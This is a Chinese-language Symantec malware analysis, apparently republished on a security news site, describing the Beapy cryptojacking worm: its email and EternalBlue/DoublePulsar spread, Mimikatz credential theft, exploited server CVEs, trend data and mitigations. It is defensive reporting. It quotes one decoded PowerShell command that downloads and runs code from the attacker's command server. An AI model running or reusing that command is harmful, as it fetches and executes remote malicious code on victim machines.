赛门铁克安全中心首次监测到一种新型的加密劫持程序Beapy,其感染的受害者八成以上是中国企业。为此,赛门铁克在分析加密劫持活动对企业的影响后,提出多项缓解措施并制定了一系列防护解决方案。

Beapy 是一种加密劫持活动,它通过 EternalBlue (“永恒之蓝”)漏洞利用、被盗凭证和硬编码凭证在网络中快速传播,从而使企业受损,而目前主要受影响的则是中国企业。2019 年 1 月,赛门铁克首次在遥测数据中发现 Beapy 活动,同时在 Web 服务器上也检测到了该活动,而且自 3 月初以来其攻击范围一直在持续增加。

Beapy (W32.Beapy) 是一种基于文件的货币挖矿程序(coinminer),并且利用电子邮件作为初始感染源。尽管网络犯罪分子利用加密劫持的趋势相比 2018 年初的高峰期已有所下降,该活动表明,加密劫持仍然是一部分网络犯罪分子的首选手段,而现在企业则成为他们的主要目标。

Beapy 的所有受害者几乎都是企业(图 1)。Beapy 可能代表着Bluwimps 蠕虫 (MSH.Bluwimps)在2018年所呈现趋势的延续,我们在 ISTR 24 中曾提到过这一趋势——加密劫持罪犯愈发侧重于攻击企业。虽然我们尚无证据表明这些攻击是有针对性的,但 Beapy 的蠕虫功能表明它很可能被设计为主要借助企业网络进行传播。

图 1.企业与消费者 Beapy 感染事件数量的比较

这与2018 年勒索软件中所发现的趋势大体相同,尽管总体勒索软件感染事件数量下降了 20%,但企业勒索软件感染件数却增加了 12%。由此看来,企业越来越受到网络犯罪分子的关注。

Beapy恶意程序对亚洲企业影响最为严重,其中超过 80% 的受害企业位于中国,其他受害企业分别来自韩国、日本和越南。

图 2.按地区划分 Beapy 感染事件

感染链

Beapy 感染事件的最初载体是电子邮件。其流程大致为:如果电子邮件收件人打开作为附件的恶意 Excel 文档,DoublePulsar 后门程序 (Backdoor.Doublepulsar) 将自动被下载到目标机器上。与 EternalBlue 一样,DoublePulsar也会在 Shadow Brokers 转储中泄露信息,它也曾被用于极具破坏性的2017年 WannaCry 勒索软件攻击事件中。DoublePulsar 会在受感染的机器上开启后门程序并执行远程代码。EternalBlue 则利用 Windows SMB 协议中的漏洞使文件在整个网络中横向传播。

一旦被安装了 DoublePulsar,它将执行 PowerShell 命令,并在与Beapy命令和控制服务器通信后将货币挖矿程序下载到目标计算机。2019 年 2 月 15 日,赛门铁克安全中心第一次监测到了DoublePulsar 后门程序,随后 PowerShell 命令被启动,其解码内容如下:

  • IEX(New-Object Net.WebClient).downloadstring("http://v.beahh.com/v"+$env:USERDOMAIN)

这意味着设备正在联系 Beapy C&C 服务器,计算机会继续执行其他的 PowerShell 命令,然后下载货币挖矿软件。当 Beapy 扩散传播到网络中的其他计算机上时,会不断重复此过程。

如此看来,Beapy是利用未经修补的机器在网络中先站稳脚跟,然后借助 EternalBlue 向其他机器传播。但是,EternalBlue 并非 Beapy 的唯一传播技术手段,它还使用凭据盗窃工具 Hacktool.Mimikatz 从已感染的机器中收集凭证。利用这些工具,它甚至可以传播到已经安装了补丁程序的机器上。与 Bluwimps 蠕虫的运行方式类似,Beapy 还通过用户名与密码的硬编码列表尝试在整个网络中传播。2017 年和 2018 年,Bluwimps 利用货币挖掘程序感染了数千台企业机器。

Web服务器

赛门铁克遥测数据还在面向公众的 Web 服务器上发现 Beapy 的早期版本,当时该程序试图传播到与服务器相连的计算机上,形式之一是它会自动生成一个攻击目标的 IP 地址列表。

在 Web 服务器上发现的是Beapy的早期版本,它采用 C 语言编写,而不是Python,并且其攻击手段相似,被下载的恶意软件还包含用于凭证收集的 Mimikatz 模块,以及 EternalBlue 漏洞利用功能。

在Web 服务器攻击中,Beapy 还试图利用 Apache Struts 漏洞 (CVE-2017-5638)。虽然此漏洞在 2017 年已经进行了修补,但如果一旦被成功利用,就会允许远程执行代码。Beapy 还尝试利用 Apache Tomcat (CVE-2017-12615) 和 Oracle WebLogic Server (CVE-2017-10271) 中的已知漏洞。根据赛门铁克的观测,Beapy尝试利用漏洞开始于 2 月初,首次观测到与 Beapy 的 C&C服务器的连接发生在3 月 13 日,针对该 Web 服务器的攻击活动则一直持续到 4 月初。

总体说来,Beapy 活动自 3 月初以来一直在增加。

图 3.Beapy 检测量的急剧增加显而易见

Beapy 活动告诉我们什么?

尽管 2018 年的加密劫持活动有所下降(该加密劫持事件数量下降了 52%),但这仍然是网络犯罪分子的目标领域。从加密劫持的总体数据来看,我们可以发现 2019 年 3 月发生的加密劫持尝试低于 300 万次。虽然与 2018 年 2 月的峰值(当时有 800 万次加密劫持尝试)相比已有大幅下降,但它仍相当活跃。

图 4.2018 年 1 月至 2019 年 3 月的加密劫持活动

Beapy 是一个基于文件的货币挖矿软件,但有意思的是,大多数加密劫持活动都是利用基于浏览器的硬币挖掘软件来执行。它之所以受到黑客的欢迎,是因为其进入门槛低,而且甚至可以将已安装补丁的机器作为攻击目标。2017年9月推出的Coinhive 硬币挖掘服务在加密劫持的发展中起到了关键作用。这项服务使得任何人都能非常轻松地基于浏览器进行硬币挖掘,但这一服务在今年3月初已经停止运营,基于浏览器的加密劫持也随之大幅减少。关闭此服务可能会对基于浏览器的加密劫持产生巨大影响。

除此之外,与基于浏览器的货币挖矿软件相比,基于文件的硬币挖掘软件也具有明显的优势,它可以更快地挖掘硬币。作为加密劫持攻击期间最常被挖掘的加密货币,门罗币在 2018 年贬值了 90%,由此看来,网络犯罪分子更偏爱那些能更快且创造更多加密货币的挖矿程序。

图 5.基于浏览器和基于文件的硬币挖掘僵尸网络的盈利能力比较

加密劫持对企业的影响

虽然企业可能认为,他们无需像对勒索软件这类更具破坏性的威胁那样过分担心加密攻击活动,但实际上,加密攻击活动仍然可能会对公司的运营产生重大影响。

加密劫持对企业的潜在影响包括:

  • 设备运行速度降低,从而可能会导致员工的挫败感和生产力下降

  • 电池过热

  • 设备性能下降甚至无法使用,从而导致 IT 成本增加

  • 用电量的增加进而导致成本增加,特别是基于 CPU 使用量计费的云企业。

企业需要确保其网络免受各种网络安全威胁的侵害。

减轻影响

  • 部署多个重叠和相互支持的防御系统,以防止任何特定技术或保护方法出现单点故障。这包括部署端点、电子邮件和 Web 网关保护技术以及防火墙和漏洞评估解决方案。企业应始终使用最新的保护功能来更新这些安全解决方案。

  • 对使用设备或网络的所有用户进行培训,并敦促他们谨慎处理来自不熟悉来源的电子邮件以及不要轻易打开未经请求发来的附件(可能会包含基于文件的硬币挖掘恶意软件)。

  • 企业应让员工了解哪些迹象表明他们的计算机上可能存在货币挖矿程序,如果员工怀疑公司网络中的设备上可能存在货币挖矿程序,立即通知 IT。

  • 监控设备中的电池使用情况,如果发现可疑用电高峰,请仔细检查是否存在任何基于文件的挖矿程序。

  • 在设备上安装最新版的修补程序,使用强密码并启用双重身份验证。

防护

赛门铁克提供以下防护措施,以保护客户免遭此类攻击:

  • W32.Beapy

  • Hacktool.Mimikatz

  • MSH.Bluwimps

  • Backdoor.Doublepulsar

声明:本文来自赛门铁克数据安全与防护,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如有侵权,请联系 anquanneican@163.com。